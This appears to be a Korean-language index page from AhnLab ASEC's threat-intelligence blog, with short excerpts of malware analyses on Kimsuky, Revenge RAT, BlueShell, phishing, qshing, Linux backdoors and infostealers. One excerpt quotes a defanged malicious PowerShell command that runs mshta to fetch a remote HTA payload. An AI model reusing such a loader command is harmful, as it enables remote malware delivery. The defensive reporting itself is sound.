보안 프로그램 설치 과정에서 감염되는 TrollAgent (Kimsuky 그룹)
ASEC(AhnLab SEcurity intelligence Center)에서는 최근 국내 건설 관련 협회의 홈페이지 상에서 보안 프로그램 설치 시도 시, 악성코드가 다운로드 되고 있다는 정황을 확인하였다. 해당 홈페이지에서 제공하는 서비스를 사용하기 위해서는 로그인이 필요하며 보안을 위해 다양한 보안 프로그램들을 설치해야 로그인을 진행할 수 있다. 로그인을 위해 설치하도록 유도되는 프로그램들 중 악성코드가 포함된 설치 프로그램이
AhnLab EDR을 활용한 Kimsuky 그룹의 스피어 피싱 공격 탐지 (AppleSeed, AlphaSeed)
북한의 지원을 받고 있다고 알려진 Kimsuky 위협 그룹은 2013년부터 활동하고 있다. 초기에는 한국의 북한 관련 연구기관 등에 대한 공격을 진행하였으며 2014년 한국의 에너지 기관에 대한 공격이 그리고 2017년 이후에는 한국 외 다른 나라에 대한 공격도 확인되고 있다. [1] 주로 스피어 피싱 공격을 통해 국방, 방위산업, 언론, 외교, 국가기관, 학술 분야를
Fileless로 동작하는 Revenge RAT 악성코드
ASEC(AhnLab SEcurity intelligence Center)은 최근 정상 Tool을 감싸 만든 Revenge RAT 악성코드가 유포중인 것을 포착했다. 공격자는 smtp-validator, Email To Sms 등의 이름을 가진 Tool을 활용한 것으로 확인되며, 실행 시점에 정상 Tool과 악성 파일을 동시에 생성하여 실행함으로써 사용자 측에서 악성행위가 발생하는 것을 인지하기 어렵게 만들었다. 공격자는 아래 코드와 같이 smtp-verifier.exe(정상 Tool)을
국내 리눅스 시스템 공격에 사용되는 BlueShell 악성코드 (2)
AhnLab SEcurity intelligence Center(ASEC)은 과거 “국내와 태국 대상 APT 공격에 사용된 BlueShell 악성코드” [1] 블로그에서 태국과 국내 리눅스 시스템들을 대상으로 한 공격에 사용된 BlueShell 악성코드들을 다루었다. 공격자는 백도어 악성코드인 BlueShell을 커스터마이징하여 공격에 사용하였으며 특정 시스템에서만 동작하도록 조건을 설정하기도 하였다. 해당 블로그가 공개된 후에도 동일한 공격자가 제작한 BlueShell 악성코드들이 VirusTotal을 통해
도박 관련 내용으로 위장하여 유포 중인 RAT 악성코드
AhnLab SEcurity intelligence Center(ASEC)은 RAT 악성코드가 불법 도박 관련 파일로 위장하여 유포되는 것을 확인하였다. 지난 달 게시한 VenomRAT 유포 방법[1]과 동일하게 바로가기(.lnk) 파일을 통해 유포되며 HTA에서 RAT 악성코드를 바로 다운로드한다. 유포가 확인된 바로가기 파일에는 악성 파워쉘 명령어가 포함되어 있으며, MSHTA를 실행하여 악성 스크립트를 다운로드한다. 파워쉘 명령어C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.* ‘hxxp://193.***.***[.]253:7287/2.hta.hta’
AhnLab EDR을 활용한 데이터 유출 단계 탐지 (랜섬웨어 공격자들)
랜섬웨어 공격자들은 조직의 내부 네트워크를 장악한 이후 랜섬웨어를 배포해 시스템들을 암호화하며 복구를 위한 금전을 요구하는 방식으로 수익을 얻었다. 하지만 최근에는 시스템들을 암호화하는 것 외에도 조직의 내부 데이터를 유출한 이후 대가를 지불하지 않을 시 이를 공개하겠다는 협박을 함께 사용하고 있다. 일반적으로 랜섬웨어 공격자들은 데이터들을 수집한 이후 이를 압축하고 외부에 유출한다. 데이터를
국내 유명 포탈 로그인 페이지로 위장한 피싱 사례 분석
AhnLab SEcurity intelligence Center(ASEC)은 최근 국내 유명 포탈 N사의 로그인 페이지로 위장한 피싱 사례를 분석하였으며, 공격자에 대한 일부 정보를 확보하였다. 피싱 메일 등에 첨부된 하이퍼링크 형태로 유포되었을 것으로 추정되는 가짜 로그인 페이지는 실제 N사의 로그인 페이지와 매우 흡사한 것으로 확인되며, 육안으로는 피싱 사이트라는 사실을 구분하기 어렵다. 해당 페이지에 로그인 정보를
리눅스 백도어 계정을 설치하는 공격자들
AhnLab SEcurity intelligence Center(ASEC)은 리눅스 SSH 허니팟을 활용하여 불특정 다수의 리눅스 시스템을 대상으로 한 공격을 모니터링하고 있다. 공격자들은 기본적으로 설정되어 있거나 단순한 형태의 비밀번호를 사용하는 부적절하게 관리되고 있는 리눅스 시스템들을 무차별 대입 공격 및 사전 공격하여 악성코드들을 설치하고 있다. 웜, 코인 마이너 및 DDoS Bot을 설치하는 다양한 공격 사례들이 존재하지만
임금 수령 통지서를 위장한 큐싱 메일 유포
AhnLab SEcurity intelligence Center(ASEC) 은 최근 중화인민공화국 재정부를 사칭한 큐싱 메일이 유포 중인 것을 확인하였다. 큐싱이란(Qshing), QR 코드와 피싱(Phishing) 의 합성어로 QR 코드를 스캔하게 되면 악성 앱 설치 또는 피싱 사이트에 접속하게 한다. 유포 중인 메일은 [그림 1] 과 같으며, 2024년 1분기 임금 수령 통지서를 위장하고 있다. 본문에는 임금 보조금을
AhnLab MDS를 활용한 계정 정보 탈취 악성코드 탐지 (웹 브라우저, 이메일, FTP)
일반적으로 사용자들은 편의를 위해 웹 브라우저나 이메일 / FTP 클라이언트와 같은 프로그램들에서 자동 로그인 기능을 사용하며 결과적으로 각 프로그램들은 설정 데이터에 사용자의 계정 정보들을 저장한다. 이러한 기능은 사용자에게 편의성을 주지만 보안상 문제점도 존재하는데 공격자에 의해 사용자의 계정 정보가 쉽게 탈취당할 수 있기 때문이다. 만약 악성코드나 공격자가 감염 시스템에 대한 제어를
